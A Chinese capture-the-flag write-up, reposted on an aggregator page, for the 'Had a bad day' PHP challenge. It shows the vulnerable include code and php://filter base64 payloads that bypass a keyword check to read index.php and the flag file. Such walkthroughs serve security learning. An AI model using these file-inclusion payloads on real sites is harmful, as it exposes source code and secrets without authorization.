当前位置: 首页 > news >正文

[BSidesCF 2020]Had a bad day

news 2025/7/7 2:43:00

先看url,发现可能有注入

http://655c742e-b427-485c-9e15-20a1e7ef1717.node5.buuoj.cn:81/index.php?category=woofers

试试能不能查看index.php直接?category=index.php不行,试试伪协议

image-20240123155428022

把.php去掉试试

image-20240123155516417

base64解码

image-20240123155617527

    <?php$file = $_GET['category'];
​if(isset($file)){if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){include ($file . '.php');}else{echo "Sorry, we currently only support woofers and meowers.";}}?>

说明参数要包含woofers、meowers、index

试试读取flag文件

?category=php://filter/convert.base64-encode/index/resource=flag

image-20240123155923139

base64解码

image-20240123160012789

http://www.lryc.cn/news/287725.html

相关文章:

  • [笔记]事务简介-springboot
  • 初识计算机网络 | 计算机网络的发展 | 协议初识
  • 【sgTree】自定义组件:加载el-tree树节点整棵树数据,实现增删改操作。
  • vue2面试题:vue组件之间的通信方式有哪些?
  • Pytorch神经网络模型nn.Sequential与nn.Linear
  • C++-gdb调试常用功能
  • 快速上手的AI工具-文心一言辅助学习
  • Boost 适用 filesystem 库,statx 函数无法找到引用问题的解决方案。
  • MyBatis中一级缓存是什么?SqlSession一级缓存失效的原因?如何理解一级缓存?
  • 项目解决方案:多地医馆的高清视频监控接入汇聚联网
  • 【前端基础--2】
  • 【GitHub项目推荐--提取文字】【转载】
  • WebSocket与Shiro认证信息传递的实现与安全性探讨
  • QT 实现自动生成小学两位数加减法算式
  • 小程序学习-20
  • 面试题-【消息队列】
  • 【江科大】STM32:I2C通信外设(硬件)
  • 【机器学习300问】15、什么是逻辑回归模型?
  • C#调用C动态链接库
  • 前端实现转盘抽奖 - 使用 lucky-canvas 插件
  • 2024.1.23力扣每日一题——最长交替子数组
  • C语言王道练习题第七周两题
  • 某马头条——day11+day12
  • springboot实现aop
  • Golang 中高级工程师学习笔记
  • USB-C接口给显示器带来怎样的变化?
  • 写一份简单的产品说明书:格式和排版建议
  • 【Python学习】Python学习21- 正则表达式(1)
  • Docker 和 Kubernetes:容器化时代的崛起与演变
  • 美易官方京东养车回应索赔事件:推动行业健康发展并携手品牌商家加码补贴